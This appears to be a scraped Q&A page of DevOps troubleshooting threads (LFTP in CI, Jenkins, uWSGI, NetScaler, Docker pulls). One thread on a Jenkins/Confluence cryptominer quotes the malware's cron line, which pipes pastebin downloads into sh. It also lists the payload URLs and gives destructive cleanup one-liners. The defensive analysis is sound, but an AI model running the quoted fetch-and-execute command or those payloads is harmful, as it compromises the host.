Continuous deployment using LFTP gets "stuck" temporarily after about 10 files - docker

I am using GitLab Community Edition and GitLab runner CI setup to deploy (synchronize) a bunch of JSON files on a server using LFTP. This job however, seems to "freeze" for a few minutes every 10 files roughly. Having to synchronize roughly 400 files sometimes, this job simply crashes because it sometimes takes more than an hour to complete. The JSON files are all 1KB. Neither the source and target servers should have any firewalls rate limiting the FTP. Both are hosted at OVH.
The following LFTP command is executed in orer to synchronize everything:
lftp -v -c "set sftp:auto-confirm true; open sftp://$DEVELOPMENT_DEPLOY_USER:$DEVELOPMENT_DEPLOY_PASSWORD#$DEVELOPMENT_DEPLOY_HOST:$DEVELOPMENT_DEPLOY_PORT; mirror -Rev ./configuration_files configuration/configuration_files --exclude .* --exclude .*/ --include ./*.json"
Job is ran in Docker, using this container to deploy everything. What could cause this?

For those of you coming from google we had the exact same setup. The way to get LFTP to stop hanging when running in a docker or some other CI you can use this command:
lftp -c "set net:timeout 5; set net:max-retries 2; set net:reconnect-interval-base 5; set ftp:ssl-force yes; set ftp:ssl-protect-data true; open -u $USERNAME,$PASSWORD $HOST; mirror dist / -Renv --parallel=10"
This does several things:
It makes it so it won't wait forever or get into a continuous loop
when it can't do a command. This should speed things along.
Makes sure we are using SSL/TLS. If you don't need this remove those
options.
Synchronizes one folder to the new location. The options -Renv can
be explained here: https://lftp.yar.ru/lftp-man.html
Lastly in the gitlab CI I set the job to retry if it fails. This will spin up a new docker instance that gets around any open file or connection limitations. The above LFTP command will run again but since we are using the -n flag it will only move over the files that were missed on the first job if it doesn't succeed. This gets everything moved over without hassle. You can read more about CI job retrys here: https://docs.gitlab.com/ee/ci/yaml/#retry

Have you looked at using rsync instead? I'm fairly sure you can benefit from the incremental copying of files as opposed to copying the entire set over each time.

Related

Jenkins Job to run SOQL query

I'm trying to get a Jenkins job to run sfdx force:data:soql:query commands in order to migrate configuration data sets between our production org and our sandboxes after a refresh. Certain configurations do not persist on a refresh so we need a way to move that data.
Running the queries from the command line on the Jenkins server work as expected, however the job when it runs fails with the following error:
'C:\Program' is not recognized as an internal or external command, operable program or batch file.
Build step 'Execute shell' marked build as failure
The job does three things:
Authorizes to the DevHub, lists out the connected orgs, and then performs a SQOL query to just print some data - 16 lines to be exact. Here are the commands in the shell script of the job:
sfdx force:auth:jwt:grant -i ${CONNECTED_APP_CONSUMER_KEY} -u ${DEV_HUB} -f ${JENKINS_HOME}/certs/prod/server.key -r [...] -a DevHub
sfdx force:org:list
sfdx force:data:soql:query -u ${DEV_HUB} -q "SELECT Id, Name FROM [...tablename...]" -r human
I am completely stumped on why this is happening. Again, running the SOQL command directly on the server through PowerShell or Command Line works as expected. I would appreciate any help with this.
This one stumped me for a long time but we finally got it figured out.
If you are seeing this error, make sure to check your machine's environmental variables. I saw a TON of other answers pointing to this as the issue where the install of SFDX path name had spaces in it as in C:|P:rogram Files\SFDX\bin but only showed some weird command line FOR loop that made no sense what so ever.
What we did was to completely uninstall all of SFDX making sure none of it was left on the machine and reinstalled into a folder we made where there was no spaces in the path name.
Once we did that, our job worked like it was supposed to. I hope this helps others who run into this same issue.

Jenkins High CPU Usage Khugepageds

So the picture above shows a command khugepageds that is using 98 to 100 % of CPU at times.
I tried finding how does jenkins use this command or what to do about it but was not successful.
I did the following
pkill jenkins
service jenkins stop
service jenkins start
When i pkill ofcourse the usage goes down but once restart its back up again.
Anyone had this issue before?
So, we just had this happen to us. As per the other answers, and some digging of our own, we were able to kill to process (and keep it killed) by running the following command...
rm -rf /tmp/*; crontab -r -u jenkins; kill -9 PID_OF_khugepageds; crontab -r -u jenkins; rm -rf /tmp/*; reboot -h now;
Make sure to replace PID_OF_khugepageds with the PID on your machine. It will also clear the crontab entry. Run this all as one command so that the process won't resurrect itself. The machine will reboot per the last command.
NOTE: While the command above should kill the process, you will probably want to roll/regenerate your SSH keys (on the Jenkins machine, BitBucket/GitHub etc., and any other machines that Jenkins had access to) and perhaps even spin up a new Jenkins instance (if you have that option).
Yes, we were also hit by this vulnerability, thanks to pittss's we were able to detect a bit more about that.
You should check the /var/logs/syslogs for the curl pastebin script which seems to start a corn process on the system, it will try to again escalated access to /tmp folder and install unwanted packages/script.
You should remove everything from the /tmp folder, stop jenkins, check cron process and remove the ones that seem suspicious, restart the VM.
Since the above vulnerability adds unwanted executable at /tmp foler and it tries to access the VM via ssh.
This vulnerability also added a cron process on your system beware to remove that as well.
Also check the ~/.ssh folder for known_hosts and authorized_keys for any suspicious ssh public keys. The attacker can add their ssh keys to get access to your system.
Hope this helps.
This is a Confluence vulnerability https://nvd.nist.gov/vuln/detail/CVE-2019-3396 published on 25 Mar 2019. It allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.
Possible solution
Do not run Confluence as root!
Stop botnet agent: kill -9 $(cat /tmp/.X11unix); killall -9 khugepageds
Stop Confluence: <confluence_home>/app/bin/stop-confluence.sh
Remove broken crontab: crontab -u <confluence_user> -r
Plug the hole by blocking access to vulnerable path /rest/tinymce/1/macro/preview in frontend server; for nginx it is something like this:
location /rest/tinymce/1/macro/preview {
return 403;
}
Restart Confluence.
The exploit
Contains two parts: shell script from https://pastebin.com/raw/xmxHzu5P and x86_64 Linux binary from http://sowcar.com/t6/696/1554470365x2890174166.jpg
The script first kills all other known trojan/viruses/botnet agents, downloads and spawns the binary from /tmp/kerberods and iterates through /root/.ssh/known_hosts trying to spread itself to nearby machines.
The binary of size 3395072 and date Apr 5 16:19 is packed with the LSD executable packer (http://lsd.dg.com). I haven't still examined what it does. Looks like a botnet controller.
it seem like vulnerability. try look syslog (/var/log/syslog, not jenkinks log) about like this: CRON (jenkins) CMD ((curl -fsSL https://pastebin.com/raw/***||wget -q -O- https://pastebin.com/raw/***)|sh).
If that, try stop jenkins, clear /tmp dir and kill all pids started with jenkins user.
After if cpu usage down, try update to last tls version of jenkins. Next after start jenkins update all plugins in jenkins.
A solution that works, because the cron file just gets recreated is to empty jenkins' cronfile, I also changed the ownership, and also made the file immutable.
This finally stopped this process from kicking in..
In my case this was making builds fail randomly with the following error:
Maven JVM terminated unexpectedly with exit code 137
It took me a while to pay due attention to the Khugepageds process, since every place I read about this error the given solution was to increase memory.
Problem was solved with #HeffZilla solution.

Make one instance of multiple uWSGI workers perform a extra function

I have a python flask app running on uWSGI with a config file that specifics it to spawn multiple workers (which I am assuming are identical processes).
Everything works well except for one part: the python app runs a bash command to download an update a database every day using a scheduler, which needs to run only once but multiple processes means that it runs multiple times at the same time, thus corrupting the downloaded file.
Is there a way to run this bash command on only one instance of uWSGI workers? I can't run the bash command as a separate cron job (the database update has to integrate seamlessly with the app).
Check The uWSGI cron-like interface
uWSGI’s master has an internal cron-like facility that can generate
events at predefined times. You can use it
You can set the options for example to:
[uwsgi]
; every two hours
cron = 0 -2 -1 -1 -1 /usr/bin/backup_my_home --recursive
Is that sufficient?

Netscaler ADC setup scheduled Clearing Persistence

Is there a way of setting up some type of CRON job on the Netscaler VPX running firmware 11.0 to automatically clear Persistence Session Records on a daily basis?
https://docs.citrix.com/en-us/netscaler/12/load-balancing/load-balancing-persistence/clearing-persistence.html
in the /nsconfig folder you have a rc.netscaler file.
Make a entry in the rc.netscaler where you add the cron job.
When you reboot the rc.netscaler will be executed.
You can also put files in the /var directory (survives reboot) and use an entry in /nsconfig/rc.netscaler to copy to /etc/....
setup a cron job on the netscaler freebsd. use the following structure for your command:
nscli -U xxx.xxx.xxx.xxx:nsroot:nsroot "clear lb persistentSessions"
edit to add the following note: keep in mind you will most likely impact anyone connected at the time when running this command (depends on your application)

Docker. How to resume downloading image when interrupted?

How can I resume pull when disconnected? The pull process always start from the beginning every time I run docker pull some-image again after disconnected. My connection is so unstable that even downloading just a 100MB image take so long and almost fails every time. So, it is almost impossible for me to pull a bigger image. So, how can I resume the pull process?
Update:
The pull process will now automatically resume based on which layers have already been downloaded. This was implemented with https://github.com/moby/moby/pull/18353.
Old:
There is no resume feature yet. However there are discussions around this feature being implemented with docker's download manager.
Docker's code isn't as updated as the moby in development repository on github. People have been having issues for several years relating to this. I had tried to manually use several patches which aren't in the upstream yet, and none worked decent.
The github repository for moby (docker's development repo) has a script called download-frozen-image-v2.sh. This script uses bash, curl, and other things like JSON interpreters via command line. It will retrieve a docker token, and then download all of the layers to a local directory. You can then use 'docker load' to insert into your local docker installation.
It does not do well with resume though. It had some comment in the script relating to 'curl -C' isn't working. I had tracked down, and fixed this problem. I made a modification which uses a ".headers" file to retrieve initially, which has always returned a 302 while I've been monitoring, and then retrieves the final using curl (+ resume support) to the layer tar file. It also has to loop on the calling function which retrieves a valid token which unfortunately only lasts about 30 minutes.
It will loop this process until it receives a 416 stating that there is no resume possible since it's ranges have been fulfilled. It also verifies the size against a curl header retrieval. I have been able to retrieve all images necessary using this modified script. Docker has many more layers relating to retrieval, and has remote control processes (Docker client) which make it more difficult to control, and they viewed this issue as only affecting some people on bad connections.
I hope this script can help you as much as it has helped me:
Changes:
fetch_blob function uses a temporary file for its first connection. It then retrieves 30x HTTP redirect from this. It attempts a header retrieval on the final url and checks whether the local copy has the full file. Otherwise, it will begin a resume curl operation. The calling function which passes it a valid token has a loop surrounding retrieving a token, and fetch_blob which ensures the full file is obtained.
The only other variation is a bandwidth limit variable which can be set at the top, or via "BW:10" command line parameter. I needed this to allow my connection to be viable for other operations.
Click here for the modified script.
In the future it would be nice if docker's internal client performed resuming properly. Increasing the amount of time for the token's validation would help tremendously..
Brief views of change code:
#loop until FULL_FILE is set in fetch_blob.. this is for bad/slow connections
while [ "$FULL_FILE" != "1" ];do
local token="$(curl -fsSL "$authBase/token?service=$authService&scope=repository:$image:pull" | jq --raw-output '.token')"
fetch_blob "$token" "$image" "$layerDigest" "$dir/$layerTar" --progress
sleep 1
done
Another section from fetch_blob:
while :; do
#if the file already exists.. we will be resuming..
if [ -f "$targetFile" ];then
#getting current size of file we are resuming
CUR=`stat --printf="%s" $targetFile`
#use curl to get headers to find content-length of the full file
LEN=`curl -I -fL "${curlArgs[#]}" "$blobRedirect"|grep content-length|cut -d" " -f2`
#if we already have the entire file... lets stop curl from erroring with 416
if [ "$CUR" == "${LEN//[!0-9]/}" ]; then
FULL_FILE=1
break
fi
fi
HTTP_CODE=`curl -w %{http_code} -C - --tr-encoding --compressed --progress-bar -fL "${curlArgs[#]}" "$blobRedirect" -o "$targetFile"`
if [ "$HTTP_CODE" == "403" ]; then
#token expired so the server stopped allowing us to resume, lets return without setting FULL_FILE and itll restart this func w new token
FULL_FILE=0
break
fi
if [ "$HTTP_CODE" == "416" ]; then
FULL_FILE=1
break
fi
sleep 1
done
Try this
ps -ef | grep docker
Get PID of all the docker pull command and do a kill -9 on them. Once killed, re-issue the docker pull <image>:<tag> command.
This worked for me!

Resources